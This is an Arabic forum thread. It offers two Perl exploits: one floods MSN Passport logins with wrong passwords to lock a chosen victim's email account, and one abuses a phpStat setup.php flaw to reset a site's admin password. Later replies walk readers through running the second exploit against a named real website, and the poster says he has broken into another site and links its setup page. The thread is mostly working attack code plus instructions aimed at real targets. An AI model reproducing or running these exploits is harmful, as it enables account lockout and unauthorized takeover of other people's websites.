ثغرة DOS في MSN Passport ,

موضوع: ثغرة DOS في MSN Passport , 9/2/2009, 14:33

السلام عليكم ,,
هناك ثغره في هذا السيرفر login.passport.com
تبع الهوتميل وانتم عارفينه اكيد ,, تقدر تسوي هجمات عليه عن طريق الايميل اللي تبي توقفه والضعف في هذا السيرفر انه لايقوم بحجب الاي بي اللي يسوي فقلود بل يحجب صاحب الايميل يعني يوقف الايميل نفسه ,,
والمفتاح للاستغلال هذا هو
lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenge r%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.600 0.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849c b7

وهو يرسل باسوردات خاطئه الى ان يقفل الحساب ,, ويجب ان تعمل الفلود قبل لا يدخل الضحيه ,,
وما اطيل عليكم الكود تحت بالبيرل ,, احفظوه بمتداد .pl وشغله على الايميل اللي تبي ,,

#!/usr/bin/perl
#
# by: Simo aka _6mO_HaCk <simo_at_morx_org>
# 1 december 2005
# MorX security research team
# www.morx.org
#
# Details:
#
# it seems that msn passport users using services such hotmail email and msn messenger and more
# are vulnerable to a remote denial of service, that allow any remote attacker to block access
# to their accounts, this problem is produced by the passport login server (login.passport.com)
# which locks users accounts when receiving wrong passwords instead of blocking the IP address
# where from the wrong passwords are being sent, so if an attacker knows a target email, the
# vulnerability can be exploited by sending continuous wrong passwords to login.passport.com:80
# after a certain number of wrong attemps the account will be blocked disallowing the victim to
# login to all msn passport network, including email and Instant Messaging services until the
# attacker stops the attack
#
# Note: The attack must start before the victim log in. Once the attack starts the victim
# will be unable to sign in.
#
# i would like to apologize in advance if this is a known issue, however this vulnerability is still
# exploitable and it's a very serious problem. hopefully the fact that i m publishing this info and
# this proof of concept exploit will push microsoft to patch their server soon
#
# Vulnerable:
# login.passport.com (used for all accounts authentification except the ones at msn.com)
# : blocks the account instead of the IP address
#
# Not vulnerable:
# msnialogin.passport.com (used only for accounts at msn.com authentification)
# : blocks the IP address instead of the account, giving the remote attacker no choice except
# in case if the attacker can pass the attack thru the victim IP address or if the attacker is
# connected from the same LAN sharing the same IP address with the target
#
# Thanks to massine and handrix for helping me test this
#
# PoC: www.morx.org/fuckmsn.txt

use IO::Socket;

if(!defined($ARGV[0])) {

system (clear);
print "\n";
print "=================================================\ n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\ n";
print "--- Usage: perl $0 <Target_Email>\n\n";
exit; }

$TARGET = $ARGV[0];
$PORT = "80";
$SERVER = "login.passport.com";
$PASSWORD = "FUCKMSN"; # MSNs nobody like them, fux0r them ... ;>
$KEYS = "lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenge r%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.600 0.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849c b7";
$NUMBER = "99999999999999999999999999999999999999999999999999 999";
$COMMAND1 = "GET /login2.srf HTTP/1.0";
$COMMAND2 = "Accept: */*";
$COMMAND3 = "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2E com,sign-in=$TARGET,pwd=$PASSWORD,$KEYS";

print "=================================================\ n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\ n";
print "[+] Attacking $TARGET ...\n";
print "[-] CTRL + C To Stop\n";
for($count=0;$count<=$NUMBER;$count++)
{
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT")
|| die "Can't connect to $SERVER";
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
$remote->autoflush();
}
print "Done, try again if needed ";

موضوع: رد: ثغرة DOS في MSN Passport , 9/2/2009, 14:49

الحين انسخ كود الثغرة واحفظو باسم sherba.pl

وضعو داخل مجلد C:\Perl\bin واسحبو للدوس او اطلبو منو

كود
كود

كود:
#!/usr/bin/perl
################################################## ###################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
################################################## ###################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
################################################## ###################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
################################################## ###################

use IO::Socket;

if (@ARGV < 3)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: \n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " phpStat.pl www.Site.com /phpstat/ 12345\n";
exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";
#
الحين غير ال usage

لاسم الموقع المصاب
phpStat.pl www.Site.com /phpstat/ 12345
غير اسم الموقع لاسم الموقع المصاب وهذا هو الموقع المصاب بعد التغير بيصير كذ

كود:
phpStat.pl www.maverickqueen.com /phpstat/ 12345لاحظ الالتزام بلمسافات وهذا ما قمنا بتغييرة داخل الكود

الحين احفظ التغيرات واسحب الملف داخل الدوس وتابع الصورة وشوف وش انا كاتب

موضوع: رد: ثغرة DOS في MSN Passport , 9/2/2009, 14:51

الحين بيقوللك

]OK ! Now Goto www.maverickqueen.com/phpstat/setup.php And L0gin Whith

يعني ادخل علي المسار التالي وسجل دخول بلباس واليوز اللي ادامك

وانتهي الدرس

واتمني تكونو استفدو

ولاي سؤال اتفضلو

سلام

موضوع: رد: ثغرة DOS في MSN Passport , 9/2/2009, 14:53

وهذا موقع تاني بعد اخترقتة وتم وضعو للتجربة لاهل العاصفة الغاليين |373|

http://www.haciendasantamarta.com/phpstat/setup.php

سلام